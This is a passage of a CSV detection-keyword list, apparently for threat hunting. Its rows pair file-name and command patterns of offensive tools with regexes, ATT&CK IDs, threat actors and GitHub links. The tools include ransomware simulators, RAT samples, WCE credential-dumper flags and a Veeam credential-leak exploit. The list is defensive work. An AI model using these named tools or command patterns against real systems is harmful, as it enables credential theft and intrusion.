TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19572" "*\Users\Public\Windows\Ui*",".{0,1000}\\Users\\Public\\Windows\\Ui.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19573" "*\Users\Public\Windows\Ui\*",".{0,1000}\\Users\\Public\\Windows\\Ui\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19574" "*\Users_Nochangedpassword.txt*",".{0,1000}\\Users_Nochangedpassword\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19575" "*\Use-Waitfor.exe*",".{0,1000}\\Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19576" "*\UUID_bypass.py*",".{0,1000}\\UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion 
Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","19579" "*\valid-creds.txt*",".{0,1000}\\valid\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19587" "*\vanity.exe*",".{0,1000}\\vanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","19588" "*\Vanity_Dump.cpp*",".{0,1000}\\Vanity_Dump\.cpp.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19589" "*\Vanity_Dump.exe*",".{0,1000}\\Vanity_Dump\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19590" 
"*\Vanity_Dump.sln*",".{0,1000}\\Vanity_Dump\.sln.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","19591" "*\VanToM RAT *.exe*",".{0,1000}\\VanToM\sRAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19592" "*\vba_gen.py*",".{0,1000}\\vba_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","19593" "*\VBad.py*",".{0,1000}\\VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","19594" "*\vbarandomizer.py*",".{0,1000}\\vbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19595" "*\vcenter_creds.txt*",".{0,1000}\\vcenter_creds\.txt.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","19598" "*\VDR-main.zip",".{0,1000}\\VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","19599" "*\veeam_dump.py*",".{0,1000}\\veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19600" 
"*\veeam-creds\*",".{0,1000}\\veeam\-creds\\.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","19601" "*\VeeamHax.exe",".{0,1000}\\VeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19602" "*\VeeamHax.pdb*",".{0,1000}\\VeeamHax\.pdb.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19603" "*\VeeamHax.sln*",".{0,1000}\\VeeamHax\.sln.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","19604" "*\Venom.v1.0.1.7z*",".{0,1000}\\Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19605" "*\Venom.v1.0.2.7z*",".{0,1000}\\Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19606" "*\Venom.v1.0.7z*",".{0,1000}\\Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19607" "*\Venom.v1.1.0.7z*",".{0,1000}\\Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","19608" "*\venomoussway.py*",".{0,1000}\\venomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19609" "*\vicesociety.txt*",".{0,1000}\\vicesociety\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19610" "*\victim_info_key.py*",".{0,1000}\\victim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google 
Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","19611" "*\Viral - Rat By Sameed.exe*",".{0,1000}\\Viral\s\-\sRat\sBy\sSameed\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19616" "*\Virus Rat v*.exe*",".{0,1000}\\Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19617" "*\Virus Rat v*.exe*",".{0,1000}\\Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19618" "*\Virus1.exe*",".{0,1000}\\Virus1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - 
T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19619" "*\VNC\.VNC-Non-Auth.txt*",".{0,1000}\\VNC\\\.VNC\-Non\-Auth\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19620" "*\vncdll.x64.dll*",".{0,1000}\\vncdll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","19621" "*\vncdll.x86.dll*",".{0,1000}\\vncdll\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","19622" 
"*\vncdump-*",".{0,1000}\\vncdump\-.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","19623" "*\void.log*",".{0,1000}\\void\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19627" "*\Voidgate.cpp*",".{0,1000}\\Voidgate\.cpp.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19628" "*\Voidgate.exe*",".{0,1000}\\Voidgate\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19629" "*\voidgate-master\*",".{0,1000}\\voidgate\-master\\.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. 
This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19630" "*\Volumiser.exe*",".{0,1000}\\Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19631" "*\Volumiser.sln*",".{0,1000}\\Volumiser\.sln.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19632" "*\Volumiser\Program.cs*",".{0,1000}\\Volumiser\\Program\.cs.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","19633" "*\Vsaver-Rat v*.exe*",".{0,1000}\\Vsaver\-Rat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19641" "*\Wait_For_Command.ps1*",".{0,1000}\\Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","19645" "*\Waitfor-Persistence.ps1*",".{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19646" "*\Waitfor-Persistence\*",".{0,1000}\\Waitfor\-Persistence\\.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19647" "*\Waitfor-Persistence-master*",".{0,1000}\\Waitfor\-Persistence\-master.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","19648" 
"*\wastedlocker.txt*",".{0,1000}\\wastedlocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19649" "*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19650" "*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19651" "*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19652" "*\wce -c *",".{0,1000}\\wce\s\-c\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19653" "*\wce -d *",".{0,1000}\\wce\s\-d\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19654" "*\wce -e*",".{0,1000}\\wce\s\-e.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19655" "*\wce -l*",".{0,1000}\\wce\s\-l.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials 
through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19656" "*\wce -r*",".{0,1000}\\wce\s\-r.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19657" "*\wce -s *",".{0,1000}\\wce\s\-s\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19658" "*\wce.exe *",".{0,1000}\\wce\.exe\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19659" "*\wce_ccache*",".{0,1000}\\wce_ccache.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19660" 
"*\wce_krbtkts*",".{0,1000}\\wce_krbtkts.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","19661" "*\wce32.exe*",".{0,1000}\\wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19662" "*\wce64.exe*",".{0,1000}\\wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential 